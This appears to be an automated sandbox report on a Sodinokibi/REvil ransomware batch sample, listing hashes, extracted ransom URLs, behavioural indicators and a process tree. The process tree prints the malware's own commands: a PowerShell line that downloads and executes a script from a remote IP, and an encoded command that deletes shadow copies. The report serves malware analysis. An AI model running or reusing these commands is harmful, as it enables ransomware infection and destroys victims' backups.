Analysis
-
max time kernel
34s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
15-08-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
9842da71e658da87f135c517a3f7aba2.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
9842da71e658da87f135c517a3f7aba2.bat
Resource
win10
General
-
Target
9842da71e658da87f135c517a3f7aba2.bat
-
Size
219B
-
MD5
5acf7c3e584d3bebc79930940e9cbb00
-
SHA1
37f0819fd07164c0b419c2947e43fd06a07fc83a
-
SHA256
62059583f678cc07ba6d42a856ff79d0747e13f0d1b2b6e2c75ec316bf47d686
-
SHA512
c6cdf567391326815253277475a921f2f454c434324592a63c91a9e08818806e223dcbc41e345debf124611a9df1474829bdbd11057e6120038292774ee5b5b8
Malware Config
Extracted
http://185.103.242.78/pastes/9842da71e658da87f135c517a3f7aba2
Extracted
C:\h29785m8-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/322534A63754DCD9
http://decryptor.cc/322534A63754DCD9
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1416 powershell.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\GetUpdate.png => \??\c:\users\admin\pictures\GetUpdate.png.h29785m8 powershell.exe File renamed C:\Users\Admin\Pictures\HideEdit.png => \??\c:\users\admin\pictures\HideEdit.png.h29785m8 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\362xmlm6d.bmp" powershell.exe -
Drops file in Program Files directory 29 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\EditUnpublish.cfg powershell.exe File opened for modification \??\c:\program files\PopAssert.ini powershell.exe File opened for modification \??\c:\program files\RegisterSelect.AAC powershell.exe File opened for modification \??\c:\program files\SearchStart.dxf powershell.exe File created \??\c:\program files\h29785m8-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointPush.wax powershell.exe File opened for modification \??\c:\program files\DisconnectUndo.dotm powershell.exe File opened for modification \??\c:\program files\EditUnblock.tif powershell.exe File opened for modification \??\c:\program files\SkipProtect.ini powershell.exe File opened for modification \??\c:\program files\UnregisterPop.php powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\h29785m8-readme.txt powershell.exe File opened for modification \??\c:\program files\ResolveInvoke.tiff powershell.exe File opened for modification \??\c:\program files\ShowCompress.wma powershell.exe File opened for modification \??\c:\program files\UndoGrant.gif powershell.exe File opened for modification \??\c:\program files\DismountInitialize.wps powershell.exe File opened for modification \??\c:\program files\ReadEnter.vbe powershell.exe File opened for modification \??\c:\program files\SplitProtect.mhtml powershell.exe File opened for modification \??\c:\program files\DenyInstall.easmx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\h29785m8-readme.txt powershell.exe File opened for modification \??\c:\program files\MoveUnpublish.dot powershell.exe File opened for modification \??\c:\program files\ReadConvertTo.DVR-MS powershell.exe File opened for modification \??\c:\program files\UnprotectFind.js powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\h29785m8-readme.txt powershell.exe File created \??\c:\program files (x86)\h29785m8-readme.txt powershell.exe File opened for modification \??\c:\program files\OutPublish.DVR powershell.exe File opened for modification \??\c:\program files\SuspendSubmit.mpeg powershell.exe File opened for modification \??\c:\program files\UnprotectRename.doc powershell.exe File opened for modification \??\c:\program files\ShowGrant.mp4 powershell.exe File opened for modification \??\c:\program files\UnlockRestart.otf powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1416 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1416 powershell.exe 1416 powershell.exe 1416 powershell.exe 1368 powershell.exe 1368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1416 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeBackupPrivilege 568 vssvc.exe Token: SeRestorePrivilege 568 vssvc.exe Token: SeAuditPrivilege 568 vssvc.exe Token: SeTakeOwnershipPrivilege 1416 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 604 wrote to memory of 1416 604 cmd.exe powershell.exe PID 604 wrote to memory of 1416 604 cmd.exe powershell.exe PID 604 wrote to memory of 1416 604 cmd.exe powershell.exe PID 604 wrote to memory of 1416 604 cmd.exe powershell.exe PID 1416 wrote to memory of 1368 1416 powershell.exe powershell.exe PID 1416 wrote to memory of 1368 1416 powershell.exe powershell.exe PID 1416 wrote to memory of 1368 1416 powershell.exe powershell.exe PID 1416 wrote to memory of 1368 1416 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\9842da71e658da87f135c517a3f7aba2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9842da71e658da87f135c517a3f7aba2');Invoke-SBNFPXFVJWUD;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:568